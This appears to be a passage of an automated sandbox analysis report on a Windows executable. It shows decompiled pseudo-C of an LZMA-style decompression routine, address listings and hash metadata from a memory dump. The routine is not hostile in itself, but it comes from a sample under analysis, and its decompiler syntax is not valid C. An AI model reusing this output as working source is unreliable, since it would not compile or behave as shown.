                              												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                              												L130:
                              												 *(__ebp - 0x58) = __eax;
                              												 *(__ebp - 0x40) = 3;
                              												goto L144;
                              											case 0x14:
                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                              												__eax =  *(__ebp - 0x80);
                              												 *(_t621 - 0x88) = _t542;
                              												goto L1;
                              											case 0x15:
                              												__eax = 0;
                              												__eflags =  *(__ebp - 0x38) - 7;
                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              												__al = __al & 0x000000fd;
                              												__eax = (__eflags >= 0) - 1 + 0xb;
                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                              												goto L120;
                              											case 0x16:
                              												__eax =  *(__ebp - 0x30);
                              												__eflags = __eax - 4;
                              												if(__eax >= 4) {
                              													_push(3);
                              													_pop(__eax);
                              												}
                              												__ecx =  *(__ebp - 4);
                              												 *(__ebp - 0x40) = 6;
                              												__eax = __eax << 7;
                              												 *(__ebp - 0x7c) = 0x19;
                              												 *(__ebp - 0x58) = __eax;
                              												goto L145;
                              											case 0x17:
                              												L145:
                              												__eax =  *(__ebp - 0x40);
                              												 *(__ebp - 0x50) = 1;
                              												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                              												goto L149;
                              											case 0x18:
                              												L146:
                              												__eflags =  *(__ebp - 0x6c);
                              												if( *(__ebp - 0x6c) == 0) {
                              													 *(__ebp - 0x88) = 0x18;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x70);
                              												__eax =  *(__ebp - 0xc);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												_t484 = __ebp - 0x70;
                              												 *_t484 =  *(__ebp - 0x70) + 1;
                              												__eflags =  *_t484;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												L148:
                              												_t487 = __ebp - 0x48;
                              												 *_t487 =  *(__ebp - 0x48) - 1;
                              												__eflags =  *_t487;
                              												L149:
                              												__eflags =  *(__ebp - 0x48);
                              												if( *(__ebp - 0x48) <= 0) {
                              													__ecx =  *(__ebp - 0x40);
                              													__ebx =  *(__ebp - 0x50);
                              													0 = 1;
                              													__eax = 1 << __cl;
                              													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                              													__eax =  *(__ebp - 0x7c);
                              													 *(__ebp - 0x44) = __ebx;
                              													while(1) {
                              														 *(_t621 - 0x88) = _t542;
                              														goto L1;
                              													}
                              												}
                              												__eax =  *(__ebp - 0x50);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                              												__eax =  *(__ebp - 0x58);
                              												__esi = __edx + __eax;
                              												 *(__ebp - 0x54) = __esi;
                              												__ax =  *__esi;
                              												__edi = __ax & 0x0000ffff;
                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              												__eflags =  *(__ebp - 0xc) - __ecx;
                              												if( *(__ebp - 0xc) >= __ecx) {
                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              													__cx = __ax;
                              													__cx = __ax >> 5;
                              													__eax = __eax - __ecx;
                              													__edx = __edx + 1;
                              													__eflags = __edx;
                              													 *__esi = __ax;
                              													 *(__ebp - 0x50) = __edx;
                              												} else {
                              													 *(__ebp - 0x10) = __ecx;
                              													0x800 = 0x800 - __edi;
                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                              													 *__esi = __cx;
                              												}
                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                              												if( *(__ebp - 0x10) >= 0x1000000) {
                              													goto L148;
                              												} else {
                              													goto L146;
                              												}
                              											case 0x19:
                              												__eflags = __ebx - 4;
                              												if(__ebx < 4) {
                              													 *(__ebp - 0x2c) = __ebx;
                              													L119:
                              													_t393 = __ebp - 0x2c;
                              													 *_t393 =  *(__ebp - 0x2c) + 1;
                              													__eflags =  *_t393;
                              													L120:
                              													__eax =  *(__ebp - 0x2c);
                              													__eflags = __eax;
                              													if(__eax == 0) {
                              														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                              														goto L170;
                              													}
                              													__eflags = __eax -  *(__ebp - 0x60);
                              													if(__eax >  *(__ebp - 0x60)) {
                              														goto L171;
                              													}
                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                              													__eax =  *(__ebp - 0x30);
                              													_t400 = __ebp - 0x60;
                              													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                              													__eflags =  *_t400;
                              													goto L123;
                              												}
                              												__ecx = __ebx;
                              												__eax = __ebx;
                              												__ecx = __ebx >> 1;
                              												__eax = __ebx & 0x00000001;
                              												__ecx = (__ebx >> 1) - 1;
                              												__al = __al | 0x00000002;
                              												__eax = (__ebx & 0x00000001) << __cl;
                              												__eflags = __ebx - 0xe;
                              												 *(__ebp - 0x2c) = __eax;
                              												if(__ebx >= 0xe) {
                              													__ebx = 0;
                              													 *(__ebp - 0x48) = __ecx;
                              													L102:
                              													__eflags =  *(__ebp - 0x48);
                              													if( *(__ebp - 0x48) <= 0) {
                              														__eax = __eax + __ebx;
                              														 *(__ebp - 0x40) = 4;
                              														 *(__ebp - 0x2c) = __eax;
                              														__eax =  *(__ebp - 4);
                              														__eax =  *(__ebp - 4) + 0x644;
                              														__eflags = __eax;
                              														L108:
                              														__ebx = 0;
                              														 *(__ebp - 0x58) = __eax;
                              														 *(__ebp - 0x50) = 1;
                              														 *(__ebp - 0x44) = 0;
                              														 *(__ebp - 0x48) = 0;
                              														L112:
                              														__eax =  *(__ebp - 0x40);
                              														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                              														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                              															_t391 = __ebp - 0x2c;
                              															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                              															__eflags =  *_t391;
                              															goto L119;
                              														}
                              														__eax =  *(__ebp - 0x50);
                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                              														__eax =  *(__ebp - 0x58);
                              														__esi = __edi + __eax;
                              														 *(__ebp - 0x54) = __esi;
                              														__ax =  *__esi;
                              														__ecx = __ax & 0x0000ffff;
                              														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                              														__eflags =  *(__ebp - 0xc) - __edx;
                              														if( *(__ebp - 0xc) >= __edx) {
                              															__ecx = 0;
                              															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                              															__ecx = 1;
                              															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                              															__ebx = 1;
                              															__ecx =  *(__ebp - 0x48);
                              															__ebx = 1 << __cl;
                              															__ecx = 1 << __cl;
                              															__ebx =  *(__ebp - 0x44);
                              															__ebx =  *(__ebp - 0x44) | __ecx;
                              															__cx = __ax;
                              															__cx = __ax >> 5;
                              															__eax = __eax - __ecx;
                              															__edi = __edi + 1;
                              															__eflags = __edi;
                              															 *(__ebp - 0x44) = __ebx;
                              															 *__esi = __ax;
                              															 *(__ebp - 0x50) = __edi;
                              														} else {
                              															 *(__ebp - 0x10) = __edx;
                              															0x800 = 0x800 - __ecx;
                              															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                              															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                              															 *__esi = __dx;
                              														}
                              														__eflags =  *(__ebp - 0x10) - 0x1000000;
                              														if( *(__ebp - 0x10) >= 0x1000000) {
                              															L111:
                              															_t368 = __ebp - 0x48;
                              															 *_t368 =  *(__ebp - 0x48) + 1;
                              															__eflags =  *_t368;
                              															goto L112;
                              														} else {
                              															goto L109;
                              														}
                              													}
                              													__ecx =  *(__ebp - 0xc);
                              													__ebx = __ebx + __ebx;
                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                              													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                              													 *(__ebp - 0x44) = __ebx;
                              													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                              														__ecx =  *(__ebp - 0x10);
                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                              														__ebx = __ebx | 0x00000001;
                              														__eflags = __ebx;
                              														 *(__ebp - 0x44) = __ebx;
                              													}
                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                              													if( *(__ebp - 0x10) >= 0x1000000) {
                              														L101:
                              														_t338 = __ebp - 0x48;
                              														 *_t338 =  *(__ebp - 0x48) - 1;
                              														__eflags =  *_t338;
                              														goto L102;
                              													} else {
                              														goto L99;
                              													}
                              												}
                              												__edx =  *(__ebp - 4);
                              												__eax = __eax - __ebx;
                              												 *(__ebp - 0x40) = __ecx;
                              												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                              												goto L108;
                              											case 0x1a:
                              												L56:
                              												__eflags =  *(__ebp - 0x64);
                              												if( *(__ebp - 0x64) == 0) {
                              													 *(__ebp - 0x88) = 0x1a;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x68);
                              												__al =  *(__ebp - 0x5c);
                              												__edx =  *(__ebp - 8);
                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                              												 *( *(__ebp - 0x68)) = __al;
                              												__ecx =  *(__ebp - 0x14);
                              												 *(__ecx +  *(__ebp - 8)) = __al;
                              												__eax = __ecx + 1;
                              												__edx = 0;
                              												_t192 = __eax %  *(__ebp - 0x74);
                              												__eax = __eax /  *(__ebp - 0x74);
                              												__edx = _t192;
                              												goto L79;
                              											case 0x1b:
                              												L75:
                              												__eflags =  *(__ebp - 0x64);
                              												if( *(__ebp - 0x64) == 0) {
                              													 *(__ebp - 0x88) = 0x1b;
                              													goto L170;
                              												}
                              												__eax =  *(__ebp - 0x14);
                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              												__eflags = __eax -  *(__ebp - 0x74);
                              												if(__eax >=  *(__ebp - 0x74)) {
                              													__eax = __eax +  *(__ebp - 0x74);
                              													__eflags = __eax;
                              												}
                              												__edx =  *(__ebp - 8);
                              												__cl =  *(__eax + __edx);
                              												__eax =  *(__ebp - 0x14);
                              												 *(__ebp - 0x5c) = __cl;
                              												 *(__eax + __edx) = __cl;
                              												__eax = __eax + 1;
                              												__edx = 0;
                              												_t274 = __eax %  *(__ebp - 0x74);
                              												__eax = __eax /  *(__ebp - 0x74);
                              												__edx = _t274;
                              												__eax =  *(__ebp - 0x68);
                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              												_t283 = __ebp - 0x64;
                              												 *_t283 =  *(__ebp - 0x64) - 1;
                              												__eflags =  *_t283;
                              												 *( *(__ebp - 0x68)) = __cl;
                              												L79:
                              												 *(__ebp - 0x14) = __edx;
                              												goto L80;
                              											case 0x1c:
                              												while(1) {
                              													L123:
                              													__eflags =  *(__ebp - 0x64);
                              													if( *(__ebp - 0x64) == 0) {
                              														break;
                              													}
                              													__eax =  *(__ebp - 0x14);
                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              													__eflags = __eax -  *(__ebp - 0x74);
                              													if(__eax >=  *(__ebp - 0x74)) {
                              														__eax = __eax +  *(__ebp - 0x74);
                              														__eflags = __eax;
                              													}
                              													__edx =  *(__ebp - 8);
                              													__cl =  *(__eax + __edx);
                              													__eax =  *(__ebp - 0x14);
                              													 *(__ebp - 0x5c) = __cl;
                              													 *(__eax + __edx) = __cl;
                              													__eax = __eax + 1;
                              													__edx = 0;
                              													_t414 = __eax %  *(__ebp - 0x74);
                              													__eax = __eax /  *(__ebp - 0x74);
                              													__edx = _t414;
                              													__eax =  *(__ebp - 0x68);
                              													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                              													__eflags =  *(__ebp - 0x30);
                              													 *( *(__ebp - 0x68)) = __cl;
                              													 *(__ebp - 0x14) = _t414;
                              													if( *(__ebp - 0x30) > 0) {
                              														continue;
                              													} else {
                              														L80:
                              														 *(__ebp - 0x88) = 2;
                              														goto L1;
                              													}
                              												}
                              												 *(__ebp - 0x88) = 0x1c;
                              												goto L170;
                              										}
                              									}
                              									L171:
                              									_t544 = _t543 | 0xffffffff;
                              									goto L172;
                              								}
                              							}
                              						}
                              					}
                              					goto L1;
                              				}
                              			}














                              0x00000000
                              0x00000000
                              0x00000000
                              0x004068ff
                              0x00406905
                              0x00406908
                              0x00406915
                              0x0040691d
                              0x00000000
                              0x00000000
                              0x004068d4
                              0x004068d4
                              0x004068d8
                              0x00407123
                              0x00000000
                              0x00407123
                              0x004068e4
                              0x004068ef
                              0x004068ef
                              0x004068ef
                              0x004068f2
                              0x004068f5
                              0x004068f8
                              0x004068fd
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00406f94
                              0x00406f94
                              0x00406f9a
                              0x00406fa0
                              0x00406fa6
                              0x00406fc0
                              0x00406fc3
                              0x00406fc9
                              0x00406fd4
                              0x00406fd6
                              0x00406fa8
                              0x00406fa8
                              0x00406fb7
                              0x00406fbb
                              0x00406fbb
                              0x00406fe0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00406925
                              0x00406927
                              0x0040692a
                              0x0040699b
                              0x0040699e
                              0x004069a1
                              0x004069a8
                              0x004069b2
                              0x00406f91
                              0x00406f91
                              0x00000000
                              0x00406f91
                              0x0040692c
                              0x00406930
                              0x00406933
                              0x00406935
                              0x00406938
                              0x0040693b
                              0x0040693d
                              0x00406940
                              0x00406942
                              0x00406947
                              0x0040694a
                              0x0040694d
                              0x00406951
                              0x00406958
                              0x0040695b
                              0x00406962
                              0x00406966
                              0x0040696e
                              0x0040696e
                              0x0040696e
                              0x00406968
                              0x00406968
                              0x00406968
                              0x0040695d
                              0x0040695d
                              0x0040695d
                              0x00406972
                              0x00406975
                              0x00406993
                              0x00406995
                              0x00000000
                              0x00406977
                              0x00406977
                              0x0040697a
                              0x0040697d
                              0x00406980
                              0x00406982
                              0x00406982
                              0x00406982
                              0x00406985
                              0x00406988
                              0x0040698a
                              0x0040698b
                              0x0040698e
                              0x00000000
                              0x0040698e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00406c2e
                              0x00406c32
                              0x00406c55
                              0x00406c58
                              0x00406c5b
                              0x00406c65
                              0x00406c34
                              0x00406c34
                              0x00406c37
                              0x00406c3a
                              0x00406c3d
                              0x00406c4a
                              0x00406c4d
                              0x00406c4d
                              0x00406f91
                              0x00406f91
                              0x00406f91
                              0x00000000
                              0x00406f91
                              0x00000000
                              0x00406c71
                              0x00406c75
                              0x00000000
                              0x00000000
                              0x00406c7b
                              0x00406c7f
                              0x00000000
                              0x00000000
                              0x00406c85
                              0x00406c87
                              0x00406c8b
                              0x00406c8b
                              0x00406c8e
                              0x00406c92
                              0x00000000
                              0x00000000
                              0x00406ce2
                              0x00406ce6
                              0x00406ced
                              0x00406cf0
                              0x00406cf3
                              0x00406cfd
                              0x00406f91
                              0x00406f91
                              0x00406f91
                              0x00000000
                              0x00406f91
                              0x00406f91
                              0x00406ce8
                              0x00000000
                              0x00000000
                              0x00406d09
                              0x00406d0d
                              0x00406d14
                              0x00406d17
                              0x00406d1a
                              0x00406d0f
                              0x00406d0f
                              0x00406d0f
                              0x00406d1d
                              0x00406d20
                              0x00406d23
                              0x00406d23
                              0x00406d26
                              0x00406d29
                              0x00406d2c
                              0x00406d2c
                              0x00406d2f
                              0x00406d36
                              0x00406d3b
                              0x00000000
                              0x00000000
                              0x00406dc9
                              0x00406dc9
                              0x00406dcd
                              0x0040716b
                              0x00000000
                              0x0040716b
                              0x00406dd3
                              0x00406dd6
                              0x00406dd9
                              0x00406ddd
                              0x00406de0
                              0x00406de6
                              0x00406de8
                              0x00406de8
                              0x00406de8
                              0x00406deb
                              0x00406dee
                              0x00000000
                              0x00000000
                              0x004069be
                              0x004069be
                              0x004069c2
                              0x0040712f
                              0x00000000
                              0x0040712f
                              0x004069c8
                              0x004069cb
                              0x004069ce
                              0x004069d2
                              0x004069d5
                              0x004069db
                              0x004069dd
                              0x004069dd
                              0x004069dd
                              0x004069e0
                              0x004069e3
                              0x004069e3
                              0x004069e6
                              0x004069e9
                              0x00000000
                              0x00000000
                              0x004069ef
                              0x004069f5
                              0x00000000
                              0x00000000
                              0x004069fb
                              0x004069fb
                              0x004069ff
                              0x00406a02
                              0x00406a05
                              0x00406a08
                              0x00406a0b
                              0x00406a0c
                              0x00406a0f
                              0x00406a11
                              0x00406a17
                              0x00406a1a
                              0x00406a1d
                              0x00406a20
                              0x00406a23
                              0x00406a26
                              0x00406a29
                              0x00406a45
                              0x00406a48
                              0x00406a4b
                              0x00406a4e
                              0x00406a55
                              0x00406a59
                              0x00406a5b
                              0x00406a5f
                              0x00406a2b
                              0x00406a2b
                              0x00406a2f
                              0x00406a37
                              0x00406a3c
                              0x00406a3e
                              0x00406a40
                              0x00406a40
                              0x00406a62
                              0x00406a69
                              0x00406a6c
                              0x00000000
                              0x00406a72
                              0x00000000
                              0x00406a72
                              0x00000000
                              0x00406a77
                              0x00406a77
                              0x00406a7b
                              0x0040713b
                              0x00000000
                              0x0040713b
                              0x00406a81
                              0x00406a84
                              0x00406a87
                              0x00406a8b
                              0x00406a8e
                              0x00406a94
                              0x00406a96
                              0x00406a96
                              0x00406a96
                              0x00406a99
                              0x00406a9c
                              0x00406a9c
                              0x00406a9c
                              0x00406aa2
                              0x00000000
                              0x00000000
                              0x00406aa4
                              0x00406aa7
                              0x00406aaa
                              0x00406aad
                              0x00406ab0
                              0x00406ab3
                              0x00406ab6
                              0x00406ab9
                              0x00406abc
                              0x00406abf
                              0x00406ac2
                              0x00406ada
                              0x00406add
                              0x00406ae0
                              0x00406ae3
                              0x00406ae3
                              0x00406ae6
                              0x00406aea
                              0x00406aec
                              0x00406ac4
                              0x00406ac4
                              0x00406acc
                              0x00406ad1
                              0x00406ad3
                              0x00406ad5
                              0x00406ad5
                              0x00406aef
                              0x00406af6
                              0x00406af9
                              0x00000000
                              0x00406afb
                              0x00000000
                              0x00406afb
                              0x00406af9
                              0x00406b00
                              0x00406b00
                              0x00406b00
                              0x00406b00
                              0x00000000
                              0x00000000
                              0x00406b3b
                              0x00406b3b
                              0x00406b3f
                              0x00407147
                              0x00000000
                              0x00407147
                              0x00406b45
                              0x00406b48
                              0x00406b4b
                              0x00406b4f
                              0x00406b52
                              0x00406b58
                              0x00406b5a
                              0x00406b5a
                              0x00406b5a
                              0x00406b5d
                              0x00406b60
                              0x00406b60
                              0x00406b66
                              0x00406b04
                              0x00406b04
                              0x00406b07
                              0x00000000
                              0x00406b07
                              0x00406b68
                              0x00406b68
                              0x00406b6b
                              0x00406b6e
                              0x00406b71
                              0x00406b74
                              0x00406b77
                              0x00406b7a
                              0x00406b7d
                              0x00406b80
                              0x00406b83
                              0x00406b86
                              0x00406b9e
                              0x00406ba1
                              0x00406ba4
                              0x00406ba7
                              0x00406ba7
                              0x00406baa
                              0x00406bae
                              0x00406bb0
                              0x00406b88
                              0x00406b88
                              0x00406b90
                              0x00406b95
                              0x00406b97
                              0x00406b99
                              0x00406b99
                              0x00406bb3
                              0x00406bba
                              0x00406bbd
                              0x00000000
                              0x00406bbf
                              0x00000000
                              0x00406bbf
                              0x00000000
                              0x00406e4c
                              0x00406e4c
                              0x00406e50
                              0x00407177
                              0x00000000
                              0x00407177
                              0x00406e56
                              0x00406e59
                              0x00406e5c
                              0x00406e60
                              0x00406e63
                              0x00406e69
                              0x00406e6b
                              0x00406e6b
                              0x00406e6b
                              0x00406e6e
                              0x00000000
                              0x00000000
                              0x00406c1c
                              0x00406c1c
                              0x00406c1f
                              0x00406f91
                              0x00406f91
                              0x00406f91
                              0x00000000
                              0x00406f91
                              0x00000000
                              0x00406f5b
                              0x00406f5f
                              0x00406f81
                              0x00406f84
                              0x00406f8e
                              0x00406f91
                              0x00406f91
                              0x00406f91
                              0x00000000
                              0x00406f91
                              0x00406f91
                              0x00406f61
                              0x00406f64
                              0x00406f68
                              0x00406f6b
                              0x00406f6b
                              0x00406f6e
                              0x00000000
                              0x00000000
                              0x00407018
                              0x0040701c
                              0x0040703a
                              0x0040703a
                              0x0040703a
                              0x00407041
                              0x00407048
                              0x0040704f
                              0x0040704f
                              0x00000000
                              0x0040704f
                              0x0040701e
                              0x00407021
                              0x00407024
                              0x00407027
                              0x0040702e
                              0x00406f72
                              0x00406f72
                              0x00406f75
                              0x00000000
                              0x00000000
                              0x00407109
                              0x0040710c
                              0x0040700d
                              0x00000000
                              0x00000000
                              0x00406d43
                              0x00406d45
                              0x00406d4c
                              0x00406d4d
                              0x00406d4f
                              0x00406d52
                              0x00000000
                              0x00000000
                              0x00406d5a
                              0x00406d5d
                              0x00406d60
                              0x00406d62
                              0x00406d64
                              0x00406d64
                              0x00406d65
                              0x00406d68
                              0x00406d6f
                              0x00406d72
                              0x00406d80
                              0x00000000
                              0x00000000
                              0x00407056
                              0x00407056
                              0x00407059
                              0x00407060
                              0x00000000
                              0x00000000
                              0x00407065
                              0x00407065
                              0x00407069
                              0x004071a1
                              0x00000000
                              0x004071a1
                              0x0040706f
                              0x00407072
                              0x00407075
                              0x00407079
                              0x0040707c
                              0x00407082
                              0x00407084
                              0x00407084
                              0x00407084
                              0x00407087
                              0x0040708a
                              0x0040708a
                              0x0040708a
                              0x0040708a
                              0x0040708d
                              0x0040708d
                              0x00407091
                              0x004070f1
                              0x004070f4
                              0x004070f9
                              0x004070fa
                              0x004070fc
                              0x004070fe
                              0x00407101
                              0x0040700d
                              0x0040700d
                              0x00000000
                              0x00407013
                              0x0040700d
                              0x00407093
                              0x00407099
                              0x0040709c
                              0x0040709f
                              0x004070a2
                              0x004070a5
                              0x004070a8
                              0x004070ab
                              0x004070ae
                              0x004070b1
                              0x004070b4
                              0x004070cd
                              0x004070d0
                              0x004070d3
                              0x004070d6
                              0x004070da
                              0x004070dc
                              0x004070dc
                              0x004070dd
                              0x004070e0
                              0x004070b6
                              0x004070b6
                              0x004070be
                              0x004070c3
                              0x004070c5
                              0x004070c8
                              0x004070c8
                              0x004070e3
                              0x004070ea
                              0x00000000
                              0x004070ec
                              0x00000000
                              0x004070ec
                              0x00000000
                              0x00406d88
                              0x00406d8b
                              0x00406dc1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef4
                              0x00406ef4
                              0x00406ef7
                              0x00406ef9
                              0x00407183
                              0x00000000
                              0x00407183
                              0x00406eff
                              0x00406f02
                              0x00000000
                              0x00000000
                              0x00406f08
                              0x00406f0c
                              0x00406f0f
                              0x00406f0f
                              0x00406f0f
                              0x00000000
                              0x00406f0f
                              0x00406d8d
                              0x00406d8f
                              0x00406d91
                              0x00406d93
                              0x00406d96
                              0x00406d97
                              0x00406d99
                              0x00406d9b
                              0x00406d9e
                              0x00406da1
                              0x00406db7
                              0x00406dbc
                              0x00406df4
                              0x00406df4
                              0x00406df8
                              0x00406e24
                              0x00406e26
                              0x00406e2d
                              0x00406e30
                              0x00406e33
                              0x00406e33
                              0x00406e38
                              0x00406e38
                              0x00406e3a
                              0x00406e3d
                              0x00406e44
                              0x00406e47
                              0x00406e74
                              0x00406e74
                              0x00406e77
                              0x00406e7a
                              0x00406eee
                              0x00406eee
                              0x00406eee
                              0x00000000
                              0x00406eee
                              0x00406e7c
                              0x00406e82
                              0x00406e85
                              0x00406e88
                              0x00406e8b
                              0x00406e8e
                              0x00406e91
                              0x00406e94
                              0x00406e97
                              0x00406e9a
                              0x00406e9d
                              0x00406eb6
                              0x00406eb8
                              0x00406ebb
                              0x00406ebc
                              0x00406ebf
                              0x00406ec1
                              0x00406ec4
                              0x00406ec6
                              0x00406ec8
                              0x00406ecb
                              0x00406ecd
                              0x00406ed0
                              0x00406ed4
                              0x00406ed6
                              0x00406ed6
                              0x00406ed7
                              0x00406eda
                              0x00406edd
                              0x00406e9f
                              0x00406e9f
                              0x00406ea7
                              0x00406eac
                              0x00406eae
                              0x00406eb1
                              0x00406eb1
                              0x00406ee0
                              0x00406ee7
                              0x00406e71
                              0x00406e71
                              0x00406e71
                              0x00406e71
                              0x00000000
                              0x00406ee9
                              0x00000000
                              0x00406ee9
                              0x00406ee7
                              0x00406dfa
                              0x00406dfd
                              0x00406dff
                              0x00406e02
                              0x00406e05
                              0x00406e08
                              0x00406e0a
                              0x00406e0d
                              0x00406e10
                              0x00406e10
                              0x00406e13
                              0x00406e13
                              0x00406e16
                              0x00406e1d
                              0x00406df1
                              0x00406df1
                              0x00406df1
                              0x00406df1

                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                              • Instruction ID: 28a04b8f37ec13448d59bb684de8c36190a5ca9e173ef22aca7ace3c2f707fcc
                              • Opcode Fuzzy Hash: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                              • Instruction Fuzzy Hash: F2713471D04229CFDF28CF98C8447ADBBB1FB48305F15806AD846BB281C7386996DF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E00406CE2() {
                              				unsigned short _t531;
                              				signed int _t532;
                              				void _t533;
                              				signed int _t534;
                              				signed int _t535;
                              				signed int _t565;
                              				signed int _t568;
                              				signed int _t589;
                              				signed int* _t606;
                              				void* _t613;
                              
                              				L0:
                              				while(1) {
                              					L0:
                              					if( *(_t613 - 0x40) != 0) {
                              						 *(_t613 - 0x84) = 0xb;
                              						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                              						goto L132;
                              					} else {
                              						__eax =  *(__ebp - 0x28);
                              						L88:
                              						 *(__ebp - 0x2c) = __eax;
                              						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              						L89:
                              						__eax =  *(__ebp - 4);
                              						 *(__ebp - 0x80) = 0x15;
                              						__eax =  *(__ebp - 4) + 0xa68;
                              						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                              						L69:
                              						 *(__ebp - 0x84) = 0x12;
                              						while(1) {
                              							L132:
                              							 *(_t613 - 0x54) = _t606;
                              							while(1) {
                              								L133:
                              								_t531 =  *_t606;
                              								_t589 = _t531 & 0x0000ffff;
                              								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                              								if( *(_t613 - 0xc) >= _t565) {
                              									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                              									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                              									 *(_t613 - 0x40) = 1;
                              									_t532 = _t531 - (_t531 >> 5);
                              									 *_t606 = _t532;
                              								} else {
                              									 *(_t613 - 0x10) = _t565;
                              									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                              									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                              								}
                              								if( *(_t613 - 0x10) >= 0x1000000) {
                              									goto L139;
                              								}
                              								L137:
                              								if( *(_t613 - 0x6c) == 0) {
                              									 *(_t613 - 0x88) = 5;
                              									L170:
                              									_t568 = 0x22;
                              									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                              									_t535 = 0;
                              									L172:
                              									return _t535;
                              								}
                              								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                              								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                              								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                              								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                              								L139:
                              								_t533 =  *(_t613 - 0x84);
                              								while(1) {
                              									 *(_t613 - 0x88) = _t533;
                              									while(1) {
                              										L1:
                              										_t534 =  *(_t613 - 0x88);
                              										if(_t534 > 0x1c) {
                              											break;
                              										}
                              										switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
                              											case 0:
                              												if( *(_t613 - 0x6c) == 0) {
                              													goto L170;
                              												}
                              												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
